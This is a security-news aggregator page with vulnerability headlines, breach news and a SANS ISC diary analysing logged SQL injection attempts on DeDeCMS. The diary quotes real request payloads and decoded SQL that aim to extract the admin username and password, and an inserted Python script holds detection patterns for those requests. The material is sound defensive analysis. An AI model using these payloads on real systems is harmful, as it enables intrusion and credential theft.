Oracle Java SE CVE-2015-0459 Remote Security Vulnerability
FUSE CVE-2015-3202 Local Privilege Escalation Vulnerability

Posted by InfoSec News on May 22


By Violet Blue
Zero Day
May 21, 2015

Headlines and infosec pros alike have been going mental over security
researcher Chris Roberts' alleged mid-flight hacking of a commercial
airplane, and his subsequent detainment by the FBI in April.

Things got hysterical last weekend when a month-old FBI search warrant
application surfaced in headlines...

Posted by InfoSec News on May 22

Forwarded from: bluknight <bluknight () skytalks info>

== https://skytalks.info ==

Skytalks is a 'sub-conference' that gives a unique platform for
researchers to share their research, for angry hackers to rant about
the issues of their industry, and for curious souls to probe
interesting issues, all without the watchful eye of the rest of the
world. With a strict, well-enforced "no recording" policy, research
that is...

Typically we try to divide attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistence) to more advanced state-sponsored attackers (lots of resources, decent skills and the ability to conduct long-lasting persistent attacks).

So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS. The attack:

GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 - Python-urllib/2.7

DeDeCMS is a Drupal-like content management system popular in China [1]. Exploits like the one above have been used at least since 2013 [2]. The site that was attacked above does not use DeDeCMS, so the attacker did not do any reconnaissance.

The attacker also doesn't bother modifying the user agent and keeps the Python-urllib/2.7 user agent, indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.

The SQL statement that is being attempted:

SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/**/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1

A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.

Sort of interesting: these were not the only attacks from these two IP addresses, and they did start out with some reconnaissance:

GET / HTTP/1.1 301 178 - +http://www.google.com/bot.html)

Here they spoof the Google user agent. They even first try out the plus/search.php URL:

GET //plus/search.php?keyword=astypeArr[111%3D@`\x5C`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C`+]=a HTTP/1.1 404 9093 - +http://www.google.com/bot.html)

But even though it returns a 404, they still proceed with the attack.
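As an added illustration (not part of the diary or of any ISC tooling), here is a small Python checker that applies the same URL-decoding and comment-stripping the diary does and tags access-log lines of the shape quoted above; the sample lines, field layout and tag names are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the "METHOD PATH PROTO STATUS BYTES REFERER UA"
# shape used in the diary; the typeArr[] payload is a shortened, non-working
# imitation of the request quoted above.
SAMPLE_LOG = [
    "GET /uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT"
    "/*%27*/1%20FROM%28select%20count%28*%29%20from%20dede_admin%29b%29]=1"
    " HTTP/1.1 301 178 - Python-urllib/2.7",
    "GET / HTTP/1.1 301 178 - Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
    "GET /index.php?page=2 HTTP/1.1 200 4521 - Mozilla/5.0 (X11; Linux) Firefox/38.0",
]

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d{3}) (\d+|-) (\S+) (.*)$")
SQL_WORDS = re.compile(r"\b(select|union|concat|information_schema|from)\b", re.I)

def normalize_sql(fragment):
    """URL-decode and strip /* */ inline comments, as the diary does by hand."""
    decoded = unquote_plus(fragment)
    decoded = re.sub(r"/\*.*?\*/", "", decoded)
    return re.sub(r"\s+", " ", decoded).strip()

def classify(line):
    """Return the list of detection tags that apply to one access-log line."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable"]
    _method, path, _proto, _status, _size, _referer, ua = m.groups()
    tags = []
    decoded = normalize_sql(path)
    # DeDeCMS plus/search.php with SQL keywords inside the typeArr[...] key.
    bracket = re.search(r"typeArr\[(.*?)\]", decoded, re.I | re.S)
    if "plus/search.php" in decoded.lower() and bracket and SQL_WORDS.search(bracket.group(1)):
        tags.append("dedecms_search_sqli")
    if ua.startswith("Python-urllib"):
        tags.append("scripted_client_ua")
    if "google.com/bot.html" in ua:
        # A claim only: confirm the source address by reverse DNS before trusting it.
        tags.append("claims_googlebot")
    return tags

def scan(lines):
    """Map line index -> tags for every line that triggered at least one rule."""
    hits = {}
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            hits[i] = tags
    return hits
```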

Johannes B. Ullrich, Ph.D.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Multiple OleumTech Products CVE-2014-2361 Local Security Bypass Vulnerability
Multiple OleumTech Products CVE-2014-2362 Predictable Random Number Generator Weakness

Posted by InfoSec News on May 22


By Dan Goodin
Ars Technica
May 21, 2015

An estimated 500 million Android phones don't completely wipe data when
their factory reset option is run, a weakness that may allow the recovery
of login credentials, text messages, e-mails, and contacts, computer
scientists said Thursday.

In the first comprehensive study of the...
MIT Kerberos 5 CVE-2014-5355 Multiple Denial of Service Vulnerabilities
[CORE-2015-0010] - Sendio ESP Information Disclosure Vulnerability
[SECURITY] [DSA 3270-1] postgresql-9.4 security update


Infosec practitioners face host of challenges
Boshoff says infosec improvements are being hindered by a lack of buy-in and support from business. "It is very difficult for security practitioners to successfully implement security protocols within an organisation when they have resistance from the ...


E-mail addresses, sexual orientations, and other sensitive details from almost four million AdultFriendFinder.com subscribers have been leaked onto the Internet following a hack that rooted the casual dating service, security researchers said.

The cache includes more than 3.8 million unique e-mail addresses of current and former subscribers, Australian security researcher Troy Hunt reported early Friday morning. The data, which is in the form of 15 Microsoft Excel spreadsheets, was first seeded to anonymous sites hosted on the Tor privacy network. It has since spread to sites on the open Internet. Links to sites hosting the data are easily found on Twitter and other social networking sites (Ars isn't publishing the locations).

The compromise was first reported by British broadcaster Channel 4. In addition to including e-mail addresses and the sexual orientations of users, the data also provided other sensitive information, such as ages, zip codes, and whether the subscriber was seeking an extramarital affair. The trove included information for deleted accounts as well as those still current.


SSL/TLS RC4 CVE-2015-2808 Information Disclosure Weakness
Oracle MySQL Server CVE-2015-0405 Remote Security Vulnerability
Oracle MySQL Server CVE-2015-2571 Remote Security Vulnerability